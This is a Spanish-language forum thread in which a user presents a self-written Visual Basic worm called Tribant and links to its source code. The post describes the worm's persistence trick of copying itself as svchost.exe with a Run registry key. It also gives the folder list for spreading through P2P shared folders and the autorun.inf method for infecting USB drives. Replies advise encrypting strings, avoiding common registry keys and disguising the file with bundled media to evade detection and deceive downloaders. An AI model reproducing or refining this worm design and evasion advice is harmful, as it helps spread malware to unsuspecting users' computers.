Hola a todos. Queria presentar mi Worm para Abril Negro. Se llama Tribant y esta programado en Visual Basic 6. Cualquier duda, comenten.


Tribant


Nombre: Tribant
Tamaño del virus: 104Kb
Nombre Tecnico: W32-TRIBANT.VB worm
Tipo: Gusano
Propagacion: P2P y USB.
Autor: Dober-ManN
Programado en: Visual Basic 6


EFECTOS:

Al abrirce, verifica si se encuentra infectada la PC victima, si no lo esta, se copia a "%windir%\svchost.exe".
Cambia sus propiedades a: _Solo lectura.
                                           _Oculto.
                                           _Archivo del sistema.

Se agrega al registro en "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost" para iniciarce con el sistema.
Ejecuta el archivo "%windir%\svchost.exe", luego se autocierra y comienza la propagacion.


PROPAGACION P2P:

Para la propagacion P2P, analiza todas las carpetas compartidas de los programas P2P en busca de archivos.

Extrae los nombre de estos archivos y se autocopia con estos nombres en todas la carpetas compartidas de los programas P2P.

Carpetas de los programas P2P en los que funciona este gusano: C:\Archivos de programa\Grokster\My Grokster\
                                                                                               C:\Archivos de programa\Morpheus\My Shared Folder\
                                                                                               C:\Archivos de programa\ICQ\shared files\
                                                                                               C:\Archivos de programa\KaZaA\My Shared Folder\
                                                                                               C:\Archivos de programa\KaZaA Lite\My Shared Folder\
                                                                                               C:\Archivos de programa\EDONKEY2000\incoming\
                                                                                               C:\Archivos de programa\eMule\Incoming\
                                                                                               C:\Archivos de programa\Filetopia3\Files\
                                                                                               C:\Archivos de programa\appleJuice\incoming\
                                                                                               C:\Archivos de programa\Gnucleus\Downloads\
                                                                                               C:\Archivos de programa\LimeWire\Shared\
                                                                                               C:\Archivos de programa\Overnet\incoming\
                                                                                               C:\Archivos de programa\Shareaza\Downloads\
                                                                                               C:\Archivos de programa\Swaptor\Download\
                                                                                               C:\Archivos de programa\WinMX\My Shared Folder\
                                                                                               C:\Archivos de programa\Tesla\Files\
                                                                                               C:\Archivos de programa\XoloX\Downloads\
                                                                                               C:\Archivos de programa\Rapigator\Share\
                                                                                               C:\Archivos de programa\KMD\My Shared Folder\
                                                                                               C:\Archivos de programa\BearShare\Shared\
                                                                                               C:\Archivos de programa\Direct Connect\Received Files\




PROPAGACION USB:

Para la propagacion USB, se autocopia con el nombre de "system.exe" y crea el archivo "autorun.inf" en las unidades desde la E:\ hasta la Z:\ cada 5s.
Cambia las propiedades del los archivos "autorun.inf" y "system.exe" a: _Solo lectura.
                                                                                                          _Oculto.
                                                                                                          _Archivo del sistema.





Este gusano no tiene rutina destructiva  (jeje, en serio, no la tiene), solo se propaga por USB y por P2P como cualquier gusano. Cualquier cosa, el codigo fuente esta completamente explicado paso por paso. Espero que les guste:

LINK DE DESCARGA: http://www.4shared.com/file/101402829/1188bee4/TRIBANT.html

SALUDOS y COMENTEN 

sabes deberias usar apis, ademas hay cosas como los paths de las carpetas compartidas usas hardcoded paths y si se cambia la ruta adios  rutina p2p la mejor opcion es buscar en el registro. descarta el wscript.shell nunca veras un buen worm usando este objeto usa apis, tienes codigo que se repite muchas veces usa bucles.

te falta una cosa importante cifrar las cadenas, ademas de que el archivo ejecutable de un proyecto tan pequeño pesa 104 kb, yo tengo gusanos con cientos de lineas de code y muchos modulos (bas y cls) y apenas pesa alrededor de los 40 kb, en parte se debe al icono que pesa nada mas que 18 kb.

La verdad vas por buen camino depuralo un poco y veras los buenos resultados que obtienes.

saludos

Bueno, aun no me he mirado el code, pero mirando el post veo que has de mejorar esto:

• 104kb
• No es buena idea poner asi las rutas, si no quieres leer del registro aunque sea hazlas asi: environ$("PROGRAMFILES") & "\path"
• La clave del registro que usa para ejecutarse con Win es muy comun
• Como dice XCryptor, si no encriptas Strings tu animalito esta muerto...

Venga, sigue asi que en unos meses veras

Saludos

Pues es mucho peso para dos simples funciones de infeccion

Si lo que quieres es que sea un tamaño confiable para los P2P lo que has de hacer es agregar algun fichero multimedia (un videito por ejemplo) y mostrarlo al ser ejecutado... incluso podrias comprobar antes de ejecutarlo si estas en alguna carpeta de descargas, tipo Downloads, Descargas, Incoming... etc

Saludos

Aprovecho que estan dando catedra para hacer una pregunta, hay algun texto con consejos para la programacion de malware, como rutas de registro interesantes o directorios mas usados de programas??

Saludos.